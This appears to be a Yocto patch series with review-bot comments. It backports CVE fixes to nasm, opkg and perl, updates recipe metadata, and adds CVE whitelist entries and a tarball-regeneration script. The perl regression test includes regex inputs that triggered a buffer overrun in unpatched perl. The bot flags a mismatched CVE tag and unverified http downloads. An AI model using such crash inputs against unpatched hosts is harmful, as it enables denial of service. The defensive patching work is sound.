14 asm/nasm.c | 26 +++++++++++++++++++++++++- 14 asm/nasm.c | 24 ++++++++++++++++++++++++
15 include/nasmlib.h | 9 +++++++++ 15 include/nasmlib.h | 9 +++++++++
16 nasm.txt | 4 ++++ 16 nasm.txt | 4 ++++
17 nasmlib/filename.c | 20 ++++++++++++++++++++ 17 nasmlib/filename.c | 20 ++++++++++++++++++++
@@ -23,34 +23,32 @@ Signed-off-by: Joshua Watt <JPEWhacker@gmail.com>
23 stdlib/strlcat.c | 2 +- 23 stdlib/strlcat.c | 2 +-
24 test/elfdebugprefix.asm | 6 ++++++ 24 test/elfdebugprefix.asm | 6 ++++++
25 test/performtest.pl | 12 ++++++++++-- 25 test/performtest.pl | 12 ++++++++++--
26 12 files changed, 83 insertions(+), 10 deletions(-) 26 12 files changed, 82 insertions(+), 9 deletions(-)
27 create mode 100644 test/elfdebugprefix.asm 27 create mode 100644 test/elfdebugprefix.asm
28 28
29diff --git a/asm/nasm.c b/asm/nasm.c 29diff --git a/asm/nasm.c b/asm/nasm.c
30index a0e1719..fc6c62e 100644 30index e5ae89a..7a7f8b4 100644
31--- a/asm/nasm.c 31--- a/asm/nasm.c
32+++ b/asm/nasm.c 32+++ b/asm/nasm.c
33@@ -938,7 +938,8 @@ enum text_options { 33@@ -939,6 +939,7 @@ enum text_options {
34 OPT_LIMIT,
35 OPT_KEEP_ALL, 34 OPT_KEEP_ALL,
36 OPT_NO_LINE, 35 OPT_NO_LINE,
37- OPT_DEBUG 36 OPT_DEBUG,
38+ OPT_DEBUG, 37+ OPT_DEBUG_PREFIX_MAP,
39+ OPT_DEBUG_PREFIX_MAP 38 OPT_REPRODUCIBLE
40 }; 39 };
41 enum need_arg { 40 enum need_arg {
42 ARG_NO, 41@@ -971,6 +972,7 @@ static const struct textargs textopts[] = {
43@@ -970,6 +971,7 @@ static const struct textargs textopts[] = {
44 {"keep-all", OPT_KEEP_ALL, ARG_NO, 0}, 42 {"keep-all", OPT_KEEP_ALL, ARG_NO, 0},
45 {"no-line", OPT_NO_LINE, ARG_NO, 0}, 43 {"no-line", OPT_NO_LINE, ARG_NO, 0},
46 {"debug", OPT_DEBUG, ARG_MAYBE, 0}, 44 {"debug", OPT_DEBUG, ARG_MAYBE, 0},
47+ {"debug-prefix-map", OPT_DEBUG_PREFIX_MAP, true, 0}, 45+ {"debug-prefix-map", OPT_DEBUG_PREFIX_MAP, true, 0},
46 {"reproducible", OPT_REPRODUCIBLE, ARG_NO, 0},
48 {NULL, OPT_BOGUS, ARG_NO, 0} 47 {NULL, OPT_BOGUS, ARG_NO, 0}
49 }; 48 };
50 49@@ -1337,6 +1339,26 @@ static bool process_arg(char *p, char *q, int pass)
51@@ -1332,6 +1334,26 @@ static bool process_arg(char *p, char *q, int pass) 50 case OPT_REPRODUCIBLE:
52 case OPT_DEBUG: 51 reproducible = true;
53 debug_nasm = param ? strtoul(param, NULL, 10) : debug_nasm+1;
54 break; 52 break;
55+ case OPT_DEBUG_PREFIX_MAP: { 53+ case OPT_DEBUG_PREFIX_MAP: {
56+ struct debug_prefix_list *d; 54+ struct debug_prefix_list *d;
@@ -75,7 +73,7 @@ index a0e1719..fc6c62e 100644
75 case OPT_HELP: 73 case OPT_HELP:
76 help(stdout); 74 help(stdout);
77 exit(0); 75 exit(0);
78@@ -2297,6 +2319,8 @@ static void help(FILE *out) 76@@ -2304,6 +2326,8 @@ static void help(FILE *out)
79 " -w-x disable warning x (also -Wno-x)\n" 77 " -w-x disable warning x (also -Wno-x)\n"
80 " -w[+-]error promote all warnings to errors (also -Werror)\n" 78 " -w[+-]error promote all warnings to errors (also -Werror)\n"
81 " -w[+-]error=x promote warning x to errors (also -Werror=x)\n" 79 " -w[+-]error=x promote warning x to errors (also -Werror=x)\n"
@@ -85,7 +83,7 @@ index a0e1719..fc6c62e 100644
85 83
86 fprintf(out, " %-20s %s\n", 84 fprintf(out, " %-20s %s\n",
87diff --git a/include/nasmlib.h b/include/nasmlib.h 85diff --git a/include/nasmlib.h b/include/nasmlib.h
88index e9bfbcc..98fc653 100644 86index 438178d..4c3e90d 100644
89--- a/include/nasmlib.h 87--- a/include/nasmlib.h
90+++ b/include/nasmlib.h 88+++ b/include/nasmlib.h
91@@ -250,10 +250,19 @@ int64_t readstrnum(char *str, int length, bool *warn); 89@@ -250,10 +250,19 @@ int64_t readstrnum(char *str, int length, bool *warn);
@@ -181,10 +179,10 @@ index 54b22f8..c4a412c 100644
181 179
182 static void as86_cleanup(void) 180 static void as86_cleanup(void)
183diff --git a/output/outcoff.c b/output/outcoff.c 181diff --git a/output/outcoff.c b/output/outcoff.c
184index bcd9ff3..15bfcf3 100644 182index 58fa024..14baf7b 100644
185--- a/output/outcoff.c 183--- a/output/outcoff.c
186+++ b/output/outcoff.c 184+++ b/output/outcoff.c
187@@ -1095,14 +1095,14 @@ static void coff_symbol(char *name, int32_t strpos, int32_t value, 185@@ -1072,14 +1072,14 @@ static void coff_symbol(char *name, int32_t strpos, int32_t value,
188 186
189 static void coff_write_symbols(void) 187 static void coff_write_symbols(void)
190 { 188 {
@@ -215,7 +213,7 @@ index 61af020..1292958 100644
215 nsects = sectlen = 0; 213 nsects = sectlen = 0;
216 syms = saa_init((int32_t)sizeof(struct elf_symbol)); 214 syms = saa_init((int32_t)sizeof(struct elf_symbol));
217diff --git a/output/outieee.c b/output/outieee.c 215diff --git a/output/outieee.c b/output/outieee.c
218index 4cc0f0f..2468724 100644 216index 6d6d4b2..cdb8333 100644
219--- a/output/outieee.c 217--- a/output/outieee.c
220+++ b/output/outieee.c 218+++ b/output/outieee.c
221@@ -207,7 +207,7 @@ static void ieee_unqualified_name(char *, char *); 219@@ -207,7 +207,7 @@ static void ieee_unqualified_name(char *, char *);
@@ -228,10 +226,10 @@ index 4cc0f0f..2468724 100644
228 fpubhead = NULL; 226 fpubhead = NULL;
229 fpubtail = &fpubhead; 227 fpubtail = &fpubhead;
230diff --git a/output/outobj.c b/output/outobj.c 228diff --git a/output/outobj.c b/output/outobj.c
231index 0d4d311..d8dd6a0 100644 229index 56b43f9..fefea94 100644
232--- a/output/outobj.c 230--- a/output/outobj.c
233+++ b/output/outobj.c 231+++ b/output/outobj.c
234@@ -638,7 +638,7 @@ static enum directive_result obj_directive(enum directive, char *); 232@@ -644,7 +644,7 @@ static enum directive_result obj_directive(enum directive, char *);
235 233
236 static void obj_init(void) 234 static void obj_init(void)
237 { 235 {
diff --git a/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch b/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch
new file mode 100644
index 0000000000..1bd49c9fd9
--- /dev/null
+++ b/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch
@@ -0,0 +1,104 @@
1From b37677f7e40276bd8f504584bcba2c092f1146a8 Mon Sep 17 00:00:00 2001
2From: "H. Peter Anvin" <hpa@zytor.com>
3Date: Mon, 7 Nov 2022 10:26:03 -0800
4Subject: [PATCH] quote_for_pmake: fix counter underrun resulting in segfault
5
6while (nbs--) { ... } ends with nbs == -1. Rather than a minimal fix,
7introduce mempset() to make these kinds of errors less likely in the
8future.
9
10Fixes: https://bugzilla.nasm.us/show_bug.cgi?id=3392815
11Reported-by: <13579and24680@gmail.com>
12Signed-off-by: H. Peter Anvin <hpa@zytor.com>
13
14Upstream-Status: Backport
15CVE: CVE-2022-4437
16
17Reference to upstream patch:
18[https://github.com/netwide-assembler/nasm/commit/2d4e6952417ec6f08b6f135d2b5d0e19b7dae30d]
19
20Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com>
21---
22 asm/nasm.c | 12 +++++-------
23 configure.ac | 1 +
24 include/compiler.h | 7 +++++++
25 3 files changed, 13 insertions(+), 7 deletions(-)
26
27diff --git a/asm/nasm.c b/asm/nasm.c
28index 7a7f8b4..675cff4 100644
29--- a/asm/nasm.c
30+++ b/asm/nasm.c
31@@ -1,6 +1,6 @@
32 /* ----------------------------------------------------------------------- *
33 *
34- * Copyright 1996-2020 The NASM Authors - All Rights Reserved
35+ * Copyright 1996-2022 The NASM Authors - All Rights Reserved
36 * See the file AUTHORS included with the NASM distribution for
37 * the specific copyright holders.
38 *
39@@ -814,8 +814,7 @@ static char *quote_for_pmake(const char *str)
40 }
41
42 /* Convert N backslashes at the end of filename to 2N backslashes */
43- if (nbs)
44- n += nbs;
45+ n += nbs;
46
47 os = q = nasm_malloc(n);
48
49@@ -824,10 +823,10 @@ static char *quote_for_pmake(const char *str)
50 switch (*p) {
51 case ' ':
52 case '\t':
53- while (nbs--)
54- *q++ = '\\';
55+ q = mempset(q, '\\', nbs);
56 *q++ = '\\';
57 *q++ = *p;
58+ nbs = 0;
59 break;
60 case '$':
61 *q++ = *p;
62@@ -849,9 +848,8 @@ static char *quote_for_pmake(const char *str)
63 break;
64 }
65 }
66- while (nbs--)
67- *q++ = '\\';
68
69+ q = mempset(q, '\\', nbs);
70 *q = '\0';
71
72 return os;
73diff --git a/configure.ac b/configure.ac
74index 39680b1..940ebe2 100644
75--- a/configure.ac
76+++ b/configure.ac
77@@ -199,6 +199,7 @@ AC_CHECK_FUNCS(strrchrnul)
78 AC_CHECK_FUNCS(iscntrl)
79 AC_CHECK_FUNCS(isascii)
80 AC_CHECK_FUNCS(mempcpy)
81+AC_CHECK_FUNCS(mempset)
82
83 AC_CHECK_FUNCS(getuid)
84 AC_CHECK_FUNCS(getgid)
85diff --git a/include/compiler.h b/include/compiler.h
86index db3d6d6..b64da6a 100644
87--- a/include/compiler.h
88+++ b/include/compiler.h
89@@ -256,6 +256,13 @@ static inline void *mempcpy(void *dst, const void *src, size_t n)
90 }
91 #endif
92
93+#ifndef HAVE_MEMPSET
94+static inline void *mempset(void *dst, int c, size_t n)
95+{
96+ return (char *)memset(dst, c, n) + n;
97+}
98+#endif
99+
100 /*
101 * Hack to support external-linkage inline functions
102 */
103--
1042.40.0
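Review bot: The `CVE:` tag on line 15 of this new patch reads `CVE-2022-4437`, which does not match the file name `CVE-2022-44370.patch` or the name the recipe adds to `SRC_URI`. One of the two is presumably a typo. Tooling that reads the `CVE:` tag from patch headers would record an identifier that the file name does not back up. If the file name is the correct one, the tag should read `CVE: CVE-2022-44370`.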
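--- a/meta/recipes-devtools/nasm/nasm_2.15.03.bb
+++ b/meta/recipes-devtools/nasm/nasm_2.15.05.bb
@@ -1,18 +1,21 @@
 SUMMARY = "General-purpose x86 assembler"
 SECTION = "devel"
+HOMEPAGE = "http://www.nasm.us/"
+DESCRIPTION = "The Netwide Assembler (NASM) is an assembler and disassembler for the Intel x86 architecture."
 LICENSE = "BSD-2-Clause"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=90904486f8fbf1861cf42752e1a39efe"
 
 SRC_URI = "http://www.nasm.us/pub/nasm/releasebuilds/${PV}/nasm-${PV}.tar.bz2 \
  file://0001-stdlib-Add-strlcat.patch \
  file://0002-Add-debug-prefix-map-option.patch \
+ file://CVE-2022-44370.patch \
  "
 
-SRC_URI[sha256sum] = "04e7343d9bf112bffa9fda86f6c7c8b120c2ccd700b882e2db9f57484b1bd778"
+SRC_URI[sha256sum] = "3c4b8339e5ab54b1bcb2316101f8985a5da50a3f9e504d43fa6f35668bee2fd0"
 
 EXTRA_AUTORECONF_append = " -I autoconf/m4"
 
-inherit autotools
+inherit autotools-brokensep
 
 BBCLASSEXTEND = "native"
 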
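--- a/meta/recipes-devtools/ninja/ninja_1.10.0.bb
+++ b/meta/recipes-devtools/ninja/ninja_1.10.0.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Ninja is a small build system with a focus on speed."
 HOMEPAGE = "https://ninja-build.org/"
+DESCRIPTION = "Ninja is a small build system with a focus on speed. It differs from other build systems in two major respects: it is designed to have its input files generated by a higher-level build system, and it is designed to run builds as fast as possible."
 LICENSE = "Apache-2.0"
 LIC_FILES_CHKSUM = "file://COPYING;md5=a81586a64ad4e476c791cda7e2f2c52e"
 
@@ -7,7 +8,7 @@ DEPENDS = "re2c-native ninja-native"
 
 SRCREV = "ed7f67040b370189d989adbd60ff8ea29957231f"
 
-SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release"
+SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release;protocol=https"
 UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)"
 
 S = "${WORKDIR}/git"
@@ -28,3 +29,6 @@ do_install() {
 }
 
 BBCLASSEXTEND = "native nativesdk"
+
+# This is a different Ninja
+CVE_CHECK_WHITELIST += "CVE-2021-4336"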
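Review bot: The comment above the new `CVE_CHECK_WHITELIST` entry in the last hunk, `# This is a different Ninja`, does not say which product CVE-2021-4336 was filed against or where that was checked. A later audit cannot confirm the exclusion without redoing the research. The perl recipe in this same change gives a reason plus a reference URL above its whitelist line, which is the better pattern. I would expand the comment to something like `# CVE-2021-4336 is filed against a different product that shares the name "ninja", not ninja-build; see <advisory URL>`, with the real product name and link filled in.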
diff --git a/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch b/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch
new file mode 100644
index 0000000000..bec21e67f4
--- /dev/null
+++ b/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch
@@ -0,0 +1,50 @@
1From 8b45a3c4cab95382beea1ecdddeb2e4a9ed14aba Mon Sep 17 00:00:00 2001
2From: Jo-Philipp Wich <jo@mein.io>
3Date: Wed, 1 Apr 2020 21:47:40 +0200
4Subject: [PATCH 001/104] file_util.c: fix possible bad memory access in
5 file_read_line_alloc()
6
7In the case of a zero length string being returned by fgets(), the condition
8checking for a trailing new line would perform a bad memory access outside
9of `buf`. This might happen when line with a leading null byte is read.
10
11Avoid this case by checking that the string has a length of at least one
12byte. Also change the unsigned int types to size_t to store length values
13while we're at it.
14
15Upstream-Status: Backport [https://github.com/ndmsystems/opkg/commit/8b45a3c4cab95382beea1ecdddeb2e4a9ed14aba]
16
17Signed-off-by: Jo-Philipp Wich <jo@mein.io>
18Signed-off-by: Alejandro del Castillo <alejandro.delcastillo@ni.com>
19Signed-off-by: virendra thakur <virendrak@kpit.com>
20---
21 libopkg/file_util.c | 7 ++-----
22 1 file changed, 2 insertions(+), 5 deletions(-)
23
24diff --git a/libopkg/file_util.c b/libopkg/file_util.c
25index fbed7b4..ee9f59d 100644
26--- a/libopkg/file_util.c
27+++ b/libopkg/file_util.c
28@@ -127,17 +127,14 @@ char *file_readlink_alloc(const char *file_name)
29 */
30 char *file_read_line_alloc(FILE * fp)
31 {
32+ size_t buf_len, line_size;
33 char buf[BUFSIZ];
34- unsigned int buf_len;
35 char *line = NULL;
36- unsigned int line_size = 0;
37 int got_nl = 0;
38
39- buf[0] = '\0';
40-
41 while (fgets(buf, BUFSIZ, fp)) {
42 buf_len = strlen(buf);
43- if (buf[buf_len - 1] == '\n') {
44+ if (buf_len > 0 && buf[buf_len - 1] == '\n') {
45 buf_len--;
46 buf[buf_len] = '\0';
47 got_nl = 1;
48--
492.25.1
50
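Review bot: `line_size` loses its `= 0` initializer when the two `unsigned int` declarations are folded into `size_t buf_len, line_size;` at the top of `file_read_line_alloc()`. The rest of the function lies outside the hunk, so it is not possible to confirm from here that every path assigns `line_size` before reading it. If any path accumulates into it first, that is a read of an indeterminate value. Keeping the initializer costs nothing: `size_t buf_len, line_size = 0;`.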
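--- a/meta/recipes-devtools/opkg/opkg_0.4.2.bb
+++ b/meta/recipes-devtools/opkg/opkg_0.4.2.bb
@@ -2,6 +2,7 @@ SUMMARY = "Open Package Manager"
 SUMMARY_libopkg = "Open Package Manager library"
 SECTION = "base"
 HOMEPAGE = "http://code.google.com/p/opkg/"
+DESCRIPTION = "Opkg is a lightweight package management system based on Ipkg."
 BUGTRACKER = "http://code.google.com/p/opkg/issues/list"
 LICENSE = "GPLv2+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f \
@@ -15,6 +16,7 @@ SRC_URI = "http://downloads.yoctoproject.org/releases/${BPN}/${BPN}-${PV}.tar.gz
  file://opkg.conf \
  file://0001-opkg_conf-create-opkg.lock-in-run-instead-of-var-run.patch \
  file://sourcedateepoch.patch \
+ file://0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch \
  file://run-ptest \
 "
 
@@ -49,7 +51,9 @@ EXTRA_OECONF_class-native = "--localstatedir=/${@os.path.relpath('${localstatedi
 do_install_append () {
  install -d ${D}${sysconfdir}/opkg
  install -m 0644 ${WORKDIR}/opkg.conf ${D}${sysconfdir}/opkg/opkg.conf
  echo "option lists_dir ${OPKGLIBDIR}/opkg/lists" >>${D}${sysconfdir}/opkg/opkg.conf
+ echo "option info_dir ${OPKGLIBDIR}/opkg/info" >>${D}${sysconfdir}/opkg/opkg.conf
+ echo "option status_file ${OPKGLIBDIR}/opkg/status" >>${D}${sysconfdir}/opkg/opkg.conf
 
  # We need to create the lock directory
  install -d ${D}${OPKGLIBDIR}/opkg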
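--- a/meta/recipes-devtools/orc/orc_0.4.31.bb
+++ b/meta/recipes-devtools/orc/orc_0.4.31.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Optimised Inner Loop Runtime Compiler"
 HOMEPAGE = "http://gstreamer.freedesktop.org/modules/orc.html"
+DESCRIPTION = "Optimised Inner Loop Runtime Compiler is a Library and set of tools for compiling and executing SIMD assembly language-like programs that operate on arrays of data."
 LICENSE = "BSD-2-Clause & BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://COPYING;md5=1400bd9d09e8af56b9ec982b3d85797e"
 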
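--- a/meta/recipes-devtools/patchelf/patchelf_0.10.bb
+++ b/meta/recipes-devtools/patchelf/patchelf_0.10.bb
@@ -1,12 +1,15 @@
-SRC_URI = "git://github.com/NixOS/patchelf;protocol=https \
+SUMMARY = "Tool to allow editing of RPATH and interpreter fields in ELF binaries"
+DESCRIPTION = "PatchELF is a simple utility for modifying existing ELF executables and libraries."
+HOMEPAGE = "https://github.com/NixOS/patchelf"
+
+LICENSE = "GPLv3"
+
+SRC_URI = "git://github.com/NixOS/patchelf;protocol=https;branch=master \
  file://handle-read-only-files.patch \
  file://fix-adjusting-startPage.patch \
  file://fix-phdrs.patch \
  "
 
-LICENSE = "GPLv3"
-SUMMARY = "Tool to allow editing of RPATH and interpreter fields in ELF binaries"
-
 SRCREV = "e1e39f3639e39360ceebb2f7ed533cede4623070"
 
 S = "${WORKDIR}/git"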
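--- /dev/null
+++ b/meta/recipes-devtools/perl/files/CVE-2023-31484.patch
@@ -0,0 +1,27 @@
+CVE: CVE-2023-31484
+Upstream-Status: Backport [ import from Ubuntu perl_5.30.0-9ubuntu0.5
+upstream https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 9c98370287f4e709924aee7c58ef21c85289a7f0 Mon Sep 17 00:00:00 2001
+From: Stig Palmquist <git@stig.io>
+Date: Tue, 28 Feb 2023 11:54:06 +0100
+Subject: [PATCH] Add verify_SSL=>1 to HTTP::Tiny to verify https server
+ identity
+
+---
+ lib/CPAN/HTTP/Client.pm | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/cpan/CPAN/lib/CPAN/HTTP/Client.pm b/cpan/CPAN/lib/CPAN/HTTP/Client.pm
+index 4fc792c26..a616fee20 100644
+--- a/cpan/CPAN/lib/CPAN/HTTP/Client.pm
++++ b/cpan/CPAN/lib/CPAN/HTTP/Client.pm
+@@ -32,6 +32,7 @@ sub mirror {
+
+ my $want_proxy = $self->_want_proxy($uri);
+ my $http = HTTP::Tiny->new(
++ verify_SSL => 1,
+ $want_proxy ? (proxy => $self->{proxy}) : ()
+ );
+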
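Review bot: With `verify_SSL => 1` passed to `HTTP::Tiny->new` in `mirror`, HTTP::Tiny needs a trusted CA bundle at run time and fails the request when it finds none. Nothing visible in this patch or in the perl recipe hunks on this page adds a runtime dependency that provides one, so on a minimal image an https CPAN mirror may go from unverified to unusable. That is the safer failure mode. It is still worth confirming that the target has a CA store, or recording the requirement next to the patch entry in the recipe with a comment such as `# CPAN over https now needs a CA bundle on the target`.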
diff --git a/meta/recipes-devtools/perl/files/CVE-2023-47038.patch b/meta/recipes-devtools/perl/files/CVE-2023-47038.patch
new file mode 100644
index 0000000000..59252c560c
--- /dev/null
+++ b/meta/recipes-devtools/perl/files/CVE-2023-47038.patch
@@ -0,0 +1,121 @@
1as per https://ubuntu.com/security/CVE-2023-47100 , CVE-2023-47100 is duplicate of CVE-2023-47038
2CVE: CVE-2023-47038 CVE-2023-47100
3Upstream-Status: Backport [ import from ubuntu perl_5.30.0-9ubuntu0.5
4upstream https://github.com/Perl/perl5/commit/12c313ce49b36160a7ca2e9b07ad5bd92ee4a010 ]
5Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
6
7Backport of:
8
9From 12c313ce49b36160a7ca2e9b07ad5bd92ee4a010 Mon Sep 17 00:00:00 2001
10From: Karl Williamson <khw@cpan.org>
11Date: Sat, 9 Sep 2023 11:59:09 -0600
12Subject: [PATCH 1/2] Fix read/write past buffer end: perl-security#140
13
14A package name may be specified in a \p{...} regular expression
15construct. If unspecified, "utf8::" is assumed, which is the package
16all official Unicode properties are in. By specifying a different
17package, one can create a user-defined property with the same
18unqualified name as a Unicode one. Such a property is defined by a sub
19whose name begins with "Is" or "In", and if the sub wishes to refer to
20an official Unicode property, it must explicitly specify the "utf8::".
21S_parse_uniprop_string() is used to parse the interior of both \p{} and
22the user-defined sub lines.
23
24In S_parse_uniprop_string(), it parses the input "name" parameter,
25creating a modified copy, "lookup_name", malloc'ed with the same size as
26"name". The modifications are essentially to create a canonicalized
27version of the input, with such things as extraneous white-space
28stripped off. I found it convenient to strip off the package specifier
29"utf8::". To to so, the code simply pretends "lookup_name" begins just
30after the "utf8::", and adjusts various other values to compensate.
31However, it missed the adjustment of one required one.
32
33This is only a problem when the property name begins with "perl" and
34isn't "perlspace" nor "perlword". All such ones are undocumented
35internal properties.
36
37What happens in this case is that the input is reparsed with slightly
38different rules in effect as to what is legal versus illegal. The
39problem is that "lookup_name" no longer is pointing to its initial
40value, but "name" is. Thus the space allocated for filling "lookup_name"
41is now shorter than "name", and as this shortened "lookup_name" is
42filled by copying suitable portions of "name", the write can be to
43unallocated space.
44
45The solution is to skip the "utf8::" when reparsing "name". Then both
46"lookup_name" and "name" are effectively shortened by the same amount,
47and there is no going off the end.
48
49This commit also does white-space adjustment so that things align
50vertically for readability.
51
52This can be easily backported to earlier Perl releases.
53---
54 regcomp.c | 17 +++++++++++------
55 t/re/pat_advanced.t | 8 ++++++++
56 2 files changed, 19 insertions(+), 6 deletions(-)
57
58--- a/regcomp.c
59+++ b/regcomp.c
60@@ -22606,7 +22606,7 @@ Perl_parse_uniprop_string(pTHX_
61 * compile perl to know about them) */
62 bool is_nv_type = FALSE;
63
64- unsigned int i, j = 0;
65+ unsigned int i = 0, i_zero = 0, j = 0;
66 int equals_pos = -1; /* Where the '=' is found, or negative if none */
67 int slash_pos = -1; /* Where the '/' is found, or negative if none */
68 int table_index = 0; /* The entry number for this property in the table
69@@ -22717,9 +22717,13 @@ Perl_parse_uniprop_string(pTHX_
70 * all of them are considered to be for that package. For the purposes of
71 * parsing the rest of the property, strip it off */
72 if (non_pkg_begin == STRLENs("utf8::") && memBEGINPs(name, name_len, "utf8::")) {
73- lookup_name += STRLENs("utf8::");
74- j -= STRLENs("utf8::");
75- equals_pos -= STRLENs("utf8::");
76+ lookup_name += STRLENs("utf8::");
77+ j -= STRLENs("utf8::");
78+ equals_pos -= STRLENs("utf8::");
79+ i_zero = STRLENs("utf8::"); /* When resetting 'i' to reparse
80+ from the beginning, it has to be
81+ set past what we're stripping
82+ off */
83 }
84
85 /* Here, we are either done with the whole property name, if it was simple;
86@@ -22997,7 +23001,8 @@ Perl_parse_uniprop_string(pTHX_
87
88 /* We set the inputs back to 0 and the code below will reparse,
89 * using strict */
90- i = j = 0;
91+ i = i_zero;
92+ j = 0;
93 }
94 }
95
96@@ -23018,7 +23023,7 @@ Perl_parse_uniprop_string(pTHX_
97 * separates two digits */
98 if (cur == '_') {
99 if ( stricter
100- && ( i == 0 || (int) i == equals_pos || i == name_len- 1
101+ && ( i == i_zero || (int) i == equals_pos || i == name_len- 1
102 || ! isDIGIT_A(name[i-1]) || ! isDIGIT_A(name[i+1])))
103 {
104 lookup_name[j++] = '_';
105--- a/t/re/pat_advanced.t
106+++ b/t/re/pat_advanced.t
107@@ -2524,6 +2524,14 @@ EOF
108 "", {}, "*COMMIT caused positioning beyond EOS");
109 }
110
111+ { # perl-security#140, read/write past buffer end
112+ fresh_perl_like('qr/\p{utf8::perl x}/',
113+ qr/Illegal user-defined property name "utf8::perl x" in regex/,
114+ {}, "perl-security#140");
115+ fresh_perl_is('qr/\p{utf8::_perl_surrogate}/', "",
116+ {}, "perl-security#140");
117+ }
118+
119
120 # !!! NOTE that tests that aren't at all likely to crash perl should go
121 # a ways above, above these last ones. There's a comment there that, like
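--- a/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
+++ b/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
@@ -37,6 +37,7 @@ EXTRA_CPAN_BUILD_FLAGS = "--create_packlist=0"
 
 do_install_append () {
  rm -rf ${D}${docdir}/perl/html
+ sed -i "s:^#!.*:#!/usr/bin/env perl:" ${D}${bindir}/config_data
 }
 
 do_install_ptest() {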
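Review bot: The added `sed -i "s:^#!.*:#!/usr/bin/env perl:"` has no line address, so it rewrites every line of `config_data` that begins with `#!`, not just the interpreter line. Restricting it to the first line states the intent and cannot touch later content: `sed -i "1s:^#!.*:#!/usr/bin/env perl:" ${D}${bindir}/config_data`. The pattern also replaces the whole original line, so any interpreter switches on it are dropped. A one-line comment saying that this is intended would help the next reader.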
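--- a/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
+++ b/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
@@ -53,6 +53,7 @@ do_install_ptest() {
  chown -R root:root ${D}${PTEST_PATH}/samples
 }
 
+RDEPENDS_${PN} += "perl-module-carp perl-module-file-spec"
 RDEPENDS_${PN}-ptest += "perl-module-filehandle perl-module-if perl-module-test perl-module-test-more"
 
 BBCLASSEXTEND="native nativesdk"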
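--- a/meta/recipes-devtools/perl/perl_5.30.1.bb
+++ b/meta/recipes-devtools/perl/perl_5.30.1.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Perl scripting language"
 HOMEPAGE = "http://www.perl.org/"
+DESCRIPTION = "Perl is a highly capable, feature-rich programming language"
 SECTION = "devel"
 LICENSE = "Artistic-1.0 | GPL-1.0+"
 LIC_FILES_CHKSUM = "file://Copying;md5=5b122a36d0f6dc55279a0ebc69f3c60b \
@@ -28,6 +29,8 @@ SRC_URI = "https://www.cpan.org/src/5.0/perl-${PV}.tar.gz;name=perl \
  file://CVE-2020-10878_1.patch \
  file://CVE-2020-10878_2.patch \
  file://CVE-2020-12723.patch \
+ file://CVE-2023-31484.patch \
+ file://CVE-2023-47038.patch \
  "
 SRC_URI_append_class-native = " \
  file://perl-configpm-switch.patch \
@@ -43,6 +46,10 @@ SRC_URI[perl-cross.sha256sum] = "edce0b0c2f725e2db3f203d6d8e9f3f7161256f5d159055
 
 S = "${WORKDIR}/perl-${PV}"
 
+# This is windows only issue.
+# https://ubuntu.com/security/CVE-2023-47039
+CVE_CHECK_WHITELIST += "CVE-2023-47039"
+
 inherit upstream-version-is-even update-alternatives
 
 DEPENDS += "zlib virtual/crypt"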
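--- a/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
+++ b/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
@@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 SRCREV = "edf8e6f0ea77ede073f07bff0d2ae1fc7a38103b"
 PV = "0.29.2+git${SRCPV}"
 
-SRC_URI = "git://anongit.freedesktop.org/pkg-config \
+SRC_URI = "git://gitlab.freedesktop.org/pkg-config/pkg-config.git;branch=master;protocol=https \
  file://pkg-config-esdk.in \
  file://pkg-config-native.in \
  file://fix-glib-configure-libtool-usage.patch \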
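--- /dev/null
+++ b/meta/recipes-devtools/pseudo/files/build-oldlibc
@@ -0,0 +1,20 @@
+#!/bin/sh
+#
+# Script to re-generate pseudo-prebuilt-2.33.tar.xz
+#
+# Copyright (C) 2021 Richard Purdie
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+for i in x86_64 aarch64 i686; do
+ if [ ! -e $i-nativesdk-libc.tar.xz ]; then
+ wget http://downloads.yoctoproject.org/releases/uninative/3.2/$i-nativesdk-libc.tar.xz
+ fi
+ tar -xf $i-nativesdk-libc.tar.xz --wildcards \*/lib/libpthread\* \*/lib/libdl\*
+ cd $i-linux/lib
+ ln -s libdl.so.2 libdl.so
+ ln -s libpthread.so.0 libpthread.so
+ cd ../..
+done
+tar -cJf pseudo-prebuilt-2.33.tar.xz *-linux
\ No newline at end of file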
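Review bot: The `wget` on line 12 of the new script fetches the uninative libc tarballs over plain `http://`, and the script extracts and repackages them with no checksum step. The libraries that end up in pseudo-prebuilt-2.33.tar.xz are therefore only as trustworthy as the network path at regeneration time. The recipe pins the sha256 of the resulting tarball, which protects consumers but not whoever regenerates it. I would switch the URL to `https://` and verify each download before `tar -xf`, for example `echo "<expected-sha256>  $i-nativesdk-libc.tar.xz" | sha256sum -c -` with the real published digests. A `set -e` at the top would also stop the loop when a download or `cd` fails, instead of packaging a partial tree.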
diff --git a/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch b/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch
new file mode 100644
